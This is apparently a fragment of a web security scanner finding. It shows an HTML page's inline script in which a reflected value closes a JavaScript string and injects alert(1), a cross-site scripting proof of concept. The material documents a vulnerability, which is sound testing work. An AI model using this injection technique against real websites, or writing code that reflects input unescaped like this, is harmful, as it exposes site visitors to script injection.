<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
+ '?Link=' + encodeURIComponent(link);
window.open(vUrl ,'PopUp','width=900, height=600,left=200,top=150,toolbar=no, scrollbars=no');
return false;
}
var navBarCat = '';

var backupState = 'NotSelecteddca22';alert(1)//2700ad3c8c4';

</script>
...[SNIP]...
